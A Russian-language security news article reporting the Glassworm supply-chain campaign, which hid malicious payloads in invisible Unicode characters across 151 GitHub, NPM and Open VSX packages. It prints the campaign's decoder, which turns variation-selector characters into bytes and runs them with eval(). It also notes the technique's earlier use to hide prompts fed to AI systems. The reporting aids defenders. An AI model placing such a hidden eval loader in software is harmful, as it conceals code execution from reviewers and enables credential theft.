Атака на цепочку поставок использует невидимые символы Юникода для обхода обнаружения.

✍️ OpenClawRadar📅 Опубликовано: 15 марта 2026 г.🔗 Source
Атака на цепочку поставок использует невидимые символы Юникода для обхода обнаружения.
Ad

Специалисты по безопасности из Aikido Security обнаружили атаку на цепочку поставок, использующую невидимые символы Юникода для сокрытия вредоносных функций в пакетах, загруженных на GitHub, NPM и Open VSX. Группа атакующих, получившая название Glassworm, загрузила 151 вредоносный пакет на GitHub с 3 по 9 марта 2026 года.

Как работает невидимый код

Вредоносные пакеты используют символы Юникода из областей публичного использования (также называемых публичным доступом), которые невидимы при просмотре в редакторах, терминалах и интерфейсах проверки кода. Хотя большая часть кода выглядит нормально, вредоносные функции и полезные нагрузки отображаются с помощью этих невидимых символов, что делает ручную проверку кода и традиционные средства защиты неэффективными.

Невидимые символы Юникода представляют каждую букву американского алфавита при обработке компьютерами, но отображаются как пробелы или пустые строки для людей. Интерпретаторы JavaScript могут читать и выполнять эти символы как обычный код.

Техническая реализация

В одном проанализированном пакете злоумышленники закодировали вредоносную полезную нагрузку с использованием невидимых символов. Код включает функцию декодера, которая извлекает скрытые байты и передает их в eval():

const s = v => [...v].map(
  w => (
    w = w.codePointAt(0),
    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
    null
  )
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));

Строка с обратными кавычками, передаваемая в s(), выглядит пустой в средствах просмотра, но содержит невидимые символы, которые декодируются в полную вредоносную полезную нагрузку. В предыдущих инцидентах декодированные полезные нагрузки получали и выполняли скрипты второй стадии, используя Solana в качестве канала доставки для кражи токенов, учетных данных и секретов.

Ad

Характеристики атаки

Вредоносные пакеты особенно трудно обнаружить, потому что:

  • Видимые части кода отличаются высоким качеством и реалистичностью
  • Сопутствующие изменения включают корректировки документации, обновления версий, небольшие рефакторинги и исправления ошибок
  • Изменения стилистически соответствуют целевым проектам
  • Исследователи подозревают, что для создания убедительно легитимных пакетов используются языковые модели (LLM)

Эта техника с использованием Юникода впервые была применена в 2024 году для сокрытия вредоносных промптов, подаваемых в ИИ-движки, а затем адаптирована для традиционных атак с вредоносным ПО. Обнаруженные 151 пакет, вероятно, представляют лишь небольшую часть кампании, так как многие из них были удалены после первоначальной загрузки.

📖 Read the full source: HN AI Agents

Ad

👀 Смотрите также

Данные об угрозах из 91 тыс. взаимодействий с ИИ-агентами: злоупотребление инструментами выросло на 6,4%, появились новые мультимодальные атаки.
Безопасность

Данные об угрозах из 91 тыс. взаимодействий с ИИ-агентами: злоупотребление инструментами выросло на 6,4%, появились новые мультимодальные атаки.

Анализ 91 284 взаимодействий ИИ-агентов за февраль 2026 года показывает, что злоупотребление инструментами/командами увеличилось на 6,4% до 14,5%, причём эскалация цепочки инструментов является доминирующим паттерном. Отравление RAG сместилось в сторону атак на метаданные (12,0%), а мультимодальная инъекция через изображения/PDF-файлы появилась на уровне 2,3%.

OpenClawRadar
Clawvisor: Уровень авторизации на основе целей для агентов OpenClaw
Безопасность

Clawvisor: Уровень авторизации на основе целей для агентов OpenClaw

Clawvisor — это слой авторизации, который располагается между ИИ-агентами и API, обеспечивая авторизацию на основе цели: агенты объявляют намерения, пользователи одобряют конкретные цели, а ИИ-привратник проверяет каждый запрос на соответствие этой цели. Учётные данные никогда не покидают Clawvisor, и агенты их не видят.

OpenClawRadar
Вредоносная реклама Google нацелена на установку кода Claude
Безопасность

Вредоносная реклама Google нацелена на установку кода Claude

Вредоносная реклама Google появляется как первый результат по запросу 'install claude code', пытаясь обмануть пользователей и заставить их выполнить подозрительные команды в терминале. Реклама всё ещё была активна по состоянию на 15 марта 2026 года, и автор едва избежал выполнения кода.

OpenClawRadar
Сообщается, что приложение Claude для Android читает буфер обмена без явного действия пользователя
Безопасность

Сообщается, что приложение Claude для Android читает буфер обмена без явного действия пользователя

Пользователь сообщает, что приложение Claude для Android проанализировало код из его буфера обмена без вставки, при этом Claude определил файл как pasted_text_b4a56202-3d12-43c8-aa31-a39367a9a354.txt. Поведение не удалось воспроизвести в последующих тестах.

OpenClawRadar